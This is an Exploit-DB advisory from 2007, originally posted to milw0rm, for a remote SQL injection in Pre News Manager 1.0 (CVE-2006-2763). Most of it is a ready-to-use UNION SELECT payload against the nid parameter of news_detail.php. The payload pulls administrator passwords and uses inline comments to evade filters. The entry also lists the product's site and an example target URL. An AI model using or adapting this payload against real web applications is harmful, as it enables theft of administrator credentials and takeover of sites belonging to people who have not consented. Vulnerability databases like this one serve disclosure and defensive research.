Pre News Manager 1.0 - Remote SQL Injection Vulnerability

2007-05-03T00:00:00
ID EDB-ID:3841
Type exploitdb
Reporter Mehmet Ince
Modified 2007-05-03T00:00:00

Description

Pre News Manager 1.0 Remote SQL Injection Vulnerability. CVE-2006-2763. Webapps exploit for php platform

                                        
                                            ==============================================

Pre News Manager v1.0 Remote SQL Injection

==============================================

Found: Cyber-Security.org

==============================================

Script site: http://www.preproject.com/news.asp

==============================================

Exploit:
news_detail.php?nid=-1/**/union/**/select/**/0,1,2,password,4,5,6/**/from/**/admin/*

==============================================

Example: http://www.preproject.com/news%20manager/

==============================================

# milw0rm.com [2007-05-03]